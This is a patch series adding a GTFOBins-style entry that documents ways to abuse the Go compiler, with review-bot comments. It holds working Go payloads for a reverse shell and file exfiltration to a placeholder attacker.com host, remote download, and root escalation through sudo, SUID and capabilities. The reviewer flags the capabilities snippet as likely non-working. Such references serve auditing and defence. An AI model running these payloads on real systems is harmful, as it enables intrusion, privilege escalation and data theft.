From 2764902f8944f78ee9de8a66aea5887d324108e4 Mon Sep 17 00:00:00 2001
From: Anonymous ethc4
Date: Wed, 27 Aug 2025 06:49:28 -0400
Subject: [PATCH 1/3] Create go.md
---
_gtfobins/go.md | 25 +++++++++++++++++++++++++
1 file changed, 25 insertions(+)
create mode 100644 _gtfobins/go.md
diff --git a/_gtfobins/go.md b/_gtfobins/go.md
new file mode 100644
index 00000000..8d136094
--- /dev/null
+++ b/_gtfobins/go.md
@@ -0,0 +1,25 @@
+---
+description: Go compiler binary. Can be abused to execute arbitrary commands or escalate privileges if run as root.
+functions:
+ command:
+ - code: |
+ # Execute arbitrary commands using a temporary Go module
+ CMD="id"
+ mkdir /tmp/gomod && cd /tmp/gomod
+ go mod init mod
+ echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go
+ go run main.go
+ sudo:
+ - code: |
+ # Execute arbitrary commands as root
+ CMD="id"
+ mkdir /tmp/gomod && cd /tmp/gomod
+ sudo go mod init mod
+ echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go
+ sudo go run main.go
+notes:
+ - "This abuses `go run` to execute arbitrary shell commands by creating a temporary Go module."
+ - "Requires Go compiler installed."
+ - "If run with root privileges, any command can be executed as root."
+ - "Temporary files are created in /tmp/gomod."
+---
From 0634c357bad53d0a4b53bb9a66109c2d96b0593a Mon Sep 17 00:00:00 2001
From: Anonymous ethc4
Date: Wed, 27 Aug 2025 07:00:42 -0400
Subject: [PATCH 2/3] Update go.md Fixed A Bug with the GO Code
---
_gtfobins/go.md | 72 +++++++++++++++++++++++++++++++++++++++----------
1 file changed, 58 insertions(+), 14 deletions(-)
diff --git a/_gtfobins/go.md b/_gtfobins/go.md
index 8d136094..ddeef8c5 100644
--- a/_gtfobins/go.md
+++ b/_gtfobins/go.md
@@ -1,25 +1,69 @@ --- description: Go compiler binary. Can be abused to execute arbitrary commands or escalate privileges if run as root. functions: - command: + command-exec: - code: | - # Execute arbitrary commands using a temporary Go module - CMD="id" - mkdir /tmp/gomod && cd /tmp/gomod + # Execute arbitrary commands using Go and Bash heredoc + COMMAND="id" + mkdir -p /tmp/gomod && cd /tmp/gomod go mod init mod - echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go - go run main.go + cat > main.go << EOF + package main + + import ( + "fmt" + "os" + "os/exec" + ) + + func main() { + if len(os.Args) < 2 { + fmt.Println("Usage: go run main.go ") + return + } + cmd := exec.Command("/bin/sh", "-c", os.Args[1]) + output, err := cmd.CombinedOutput() + if err != nil { + fmt.Printf("Error executing command: %v\n", err) + return + } + fmt.Printf(string(output)) + } + EOF + go run main.go "$COMMAND" sudo: - code: | # Execute arbitrary commands as root - CMD="id" - mkdir /tmp/gomod && cd /tmp/gomod + COMMAND="id" + mkdir -p /tmp/gomod && cd /tmp/gomod sudo go mod init mod - echo "package main; import \"os/exec\"; func main() { exec.Command(\"/bin/sh\",\"-c\",\"$CMD\").Run() }" > main.go - sudo go run main.go + cat > main.go << EOF + package main + + import ( + "fmt" + "os" + "os/exec" + ) + + func main() { + if len(os.Args) < 2 { + fmt.Println("Usage: go run main.go ") + return + } + cmd := exec.Command("/bin/sh", "-c", os.Args[1]) + output, err := cmd.CombinedOutput() + if err != nil { + fmt.Printf("Error executing command: %v\n", err) + return + } + fmt.Printf(string(output)) + } + EOF + sudo go run main.go "$COMMAND" notes: - - "This abuses `go run` to execute arbitrary shell commands by creating a temporary Go module." - - "Requires Go compiler installed." - - "If run with root privileges, any command can be executed as root." - - "Temporary files are created in /tmp/gomod." 
+ - "Creates a temporary Go module in /tmp/gomod and writes a Go program using heredoc." + - "Command to execute is passed as an argument to the Go program." + - "Works for normal user or with root (sudo)." + - "Temporary files are created in /tmp/gomod; cleanup recommended after use." --- From f1521d999ad153f8550a57056bb24114cef39d58 Mon Sep 17 00:00:00 2001 From: Anonymous ethc4 Date: Wed, 27 Aug 2025 08:22:57 -0400 Subject: [PATCH 3/3] Update go.md Updated go.md --- _gtfobins/go.md | 202 ++++++++++++++++++++++++++++++++++++++---------- 1 file changed, 160 insertions(+), 42 deletions(-) diff --git a/_gtfobins/go.md b/_gtfobins/go.md index ddeef8c5..033ee8f3 100644 --- a/_gtfobins/go.md +++ b/_gtfobins/go.md 
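Review bot: In both the `command-exec` and `sudo` blocks, `mkdir -p /tmp/gomod && cd /tmp/gomod` now silently accepts a directory that already exists at a fixed, guessable path under world-writable /tmp, and the `sudo` block then runs `sudo go mod init mod` and `sudo go run main.go` inside it. Anyone following the entry on a shared host ends up building as root in a directory another local user may have created and populated beforehand. A private directory, e.g. `cd "$(mktemp -d)"`, avoids that and also makes the cleanup recommended in the new note unambiguous. Separately, `fmt.Printf(string(output))` treats command output as a format string, so any `%` in it is mangled and `go vet` reports it; `fmt.Print(string(output))` is the intended call.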
@@ -1,69 +1,187 @@ --- -description: Go compiler binary. Can be abused to execute arbitrary commands or escalate privileges if run as root. +description: The payloads are compatible with Go (requires `go` compiler). functions: - command-exec: + shell: - code: | - # Execute arbitrary commands using Go and Bash heredoc - COMMAND="id" - mkdir -p /tmp/gomod && cd /tmp/gomod - go mod init mod - cat > main.go << EOF + cat > main.go << 'EOF' + package main + + import ( + "os" + "os/exec" + ) + + func main() { + cmd := exec.Command("/bin/sh") + cmd.Stdin = os.Stdin + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Run() + } + EOF + go run main.go + + reverse-shell: + - description: Run ``nc -lvnp 12345`` on the attacker box to receive the shell. + code: | + export RHOST=attacker.com + export RPORT=12345 + cat > main.go << 'EOF' + package main + + import ( + "net" + "os" + "os/exec" + ) + + func main() { + c, _ := net.Dial("tcp", os.Getenv("RHOST")+":"+os.Getenv("RPORT")) + cmd := exec.Command("/bin/sh") + cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c + cmd.Run() + } + EOF + go run main.go + + file-upload: + - description: Send local file via HTTP POST request. + code: | + export URL=http://attacker.com/upload + export LFILE=file_to_send + cat > main.go << 'EOF' + package main + + import ( + "bytes" + "net/http" + "os" + ) + + func main() { + data, _ := os.ReadFile(os.Getenv("LFILE")) + http.Post(os.Getenv("URL"), "application/octet-stream", bytes.NewReader(data)) + } + EOF + go run main.go + + file-download: + - description: Fetch a remote file via HTTP GET request. 
+ code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + cat > main.go << 'EOF' + package main + + import ( + "io" + "net/http" + "os" + ) + + func main() { + r, _ := http.Get(os.Getenv("URL")) + defer r.Body.Close() + f, _ := os.Create(os.Getenv("LFILE")) + defer f.Close() + io.Copy(f, r.Body) + } + EOF + go run main.go + + file-write: + - code: | + cat > main.go << 'EOF' + package main + + import "os" + + func main() { + os.WriteFile("file_to_write", []byte("DATA"), 0644) + } + EOF + go run main.go + + file-read: + - code: | + export LFILE=file_to_read + cat > main.go << 'EOF' package main import ( "fmt" "os" + ) + + func main() { + data, _ := os.ReadFile(os.Getenv("LFILE")) + fmt.Print(string(data)) + } + EOF + go run main.go + + suid: + - code: | + ./go run main.go + # with the `main.go` containing: + # os/exec to spawn sh with -p + cat > main.go << 'EOF' + package main + + import ( + "os" "os/exec" ) func main() { - if len(os.Args) < 2 { - fmt.Println("Usage: go run main.go ") - return - } - cmd := exec.Command("/bin/sh", "-c", os.Args[1]) - output, err := cmd.CombinedOutput() - if err != nil { - fmt.Printf("Error executing command: %v\n", err) - return - } - fmt.Printf(string(output)) + cmd := exec.Command("/bin/sh", "-p") + cmd.Stdin = os.Stdin + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Run() } EOF - go run main.go "$COMMAND" + ./go run main.go + sudo: - code: | - # Execute arbitrary commands as root - COMMAND="id" - mkdir -p /tmp/gomod && cd /tmp/gomod - sudo go mod init mod - cat > main.go << EOF + sudo go run main.go + # with main.go containing: + cat > main.go << 'EOF' + package main + + import ( + "os" + "os/exec" + ) + + func main() { + cmd := exec.Command("/bin/sh") + cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr + cmd.Run() + } + EOF + sudo go run main.go + + capabilities: + - code: | + ./go run main.go + # binary must have CAP_SETUID set + cat > main.go << 'EOF' package main import ( - 
"fmt" "os" "os/exec" + "syscall" ) func main() { - if len(os.Args) < 2 { - fmt.Println("Usage: go run main.go ") - return - } - cmd := exec.Command("/bin/sh", "-c", os.Args[1]) - output, err := cmd.CombinedOutput() - if err != nil { - fmt.Printf("Error executing command: %v\n", err) - return - } - fmt.Printf(string(output)) + syscall.Setuid(0) + cmd := exec.Command("/bin/sh") + cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr + cmd.Run() } EOF - sudo go run main.go "$COMMAND" -notes: - - "Creates a temporary Go module in /tmp/gomod and writes a Go program using heredoc." - - "Command to execute is passed as an argument to the Go program." - - "Works for normal user or with root (sudo)." - - "Temporary files are created in /tmp/gomod; cleanup recommended after use." + ./go run main.go ---
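Review bot: The `capabilities` block reads as untested. Its comment places CAP_SETUID on the `./go` binary, but `syscall.Setuid(0)` executes in the program that `go run` builds and launches as a separate executable; as far as I can tell a file capability on `./go` is not carried over to that child, so the call would be expected to fail, and its return value is discarded, so the snippet gives no sign either way. Entries like this are used to audit SUID and capability inventories, so a technique that has not been confirmed on a test host should be left out rather than listed. The same hunk deletes the `notes:` list and replaces the description with a sentence that no longer says what the binary is. I would keep the earlier `description: Go compiler binary. Can be abused to execute arbitrary commands or escalate privileges if run as root.` and restore a note that `main.go` is left behind in the working directory, since that artifact is what a responder would look for.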